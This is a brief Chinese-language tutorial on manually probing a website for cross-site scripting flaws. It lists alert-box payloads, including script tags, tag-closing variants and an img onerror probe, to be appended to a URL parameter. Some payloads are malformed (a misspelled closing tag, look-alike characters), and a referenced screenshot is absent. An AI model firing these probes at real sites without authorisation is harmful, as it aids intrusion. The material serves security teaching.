XSS漏洞挖掘
挖掘方法:
·手工挖掘
·工具挖掘
手工挖掘XSS漏洞
我们得到一个站点
http://www.cracer.com/xss.php?id=1
攻击者会这样进行XSS测试,将如下payloads分别添加到 id=1 后
可以测试用户输入的地方、文件上传的地方、flash等
闭合标签
<script>alert(1)</script>
><script>alert(1)</script>
<img/src=@ οnerrοr=alert(1)/>
><img/src=@ οnerrοr=alert(1)/>
例如在这个网站
找到带有参数的页面,并在后面加上
<script>alert(/xss/)</sript>
执行,执行后如图